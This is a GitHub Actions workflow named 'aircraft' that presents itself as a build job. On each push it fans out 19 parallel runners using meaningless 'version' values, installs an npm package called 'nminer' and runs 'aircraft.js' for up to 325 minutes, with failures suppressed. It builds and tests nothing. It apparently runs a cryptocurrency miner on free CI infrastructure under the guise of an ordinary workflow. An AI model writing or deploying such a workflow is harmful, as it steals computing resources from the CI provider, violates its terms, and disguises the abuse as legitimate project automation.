name: aircraft
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 230 }
          - { version: 3543 }
          - { version: 1279 }
          - { version: 6076 }
          - { version: 5559 }
          - { version: 5072 }
          - { version: 1000 }
          - { version: 1484 }
          - { version: 1995 }
          - { version: 3680 }
          - { version: 289 }
          - { version: 7008 }
          - { version: 4701 }
          - { version: 1013 }
          - { version: 8490 }
          - { version: 5555 }
          - { version: 2148 }
          - { version: 2743 }
          - { version: 1319 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: pish or
        run: |
          npm install nminer@latest
          timeout 325m node aircraft.js || echo "aircraft executed"